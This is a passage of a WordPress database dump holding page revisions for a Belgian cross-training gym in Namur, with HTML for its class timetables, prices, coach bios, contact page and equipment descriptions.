class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coatching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-04 19:39:35', '2013-07-04 19:39:35', '', 11, 'http://www.crosstrainingcenter.be/11-revision-107/', 0, 'revision', '', 0),
(322, 1, '2013-07-10 15:44:11', '2013-07-10 15:44:11', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:44:11', '2013-07-10 15:44:11', '', 11, 'http://www.crosstrainingcenter.be/11-revision-109/', 0, 'revision', '', 0),
(323, 1, '2013-07-10 15:45:00', '2013-07-10 15:45:00', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:45:00', '2013-07-10 15:45:00', '', 11, 'http://www.crosstrainingcenter.be/11-revision-110/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(324, 1, '2013-07-03 20:45:06', '2013-07-03 20:45:06', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoatch\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coatch</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-03 20:45:06', '2013-07-03 20:45:06', '', 20, 'http://www.crosstrainingcenter.be/20-revision-35/', 0, 'revision', '', 0),
(325, 1, '2013-07-04 18:19:44', '2013-07-04 18:19:44', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de \r\nTeam Training, Duo Training, Personnal \r\nTrainer ou Coatching nutritionnel se \r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-04 18:19:44', '2013-07-04 18:19:44', '', 9, 'http://www.crosstrainingcenter.be/9-revision-18/', 0, 'revision', '', 0),
(326, 1, '2013-07-04 16:32:39', '2013-07-04 16:32:39', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-04 16:32:39', '2013-07-04 16:32:39', '', 22, 'http://www.crosstrainingcenter.be/22-revision-29/', 0, 'revision', '', 0),
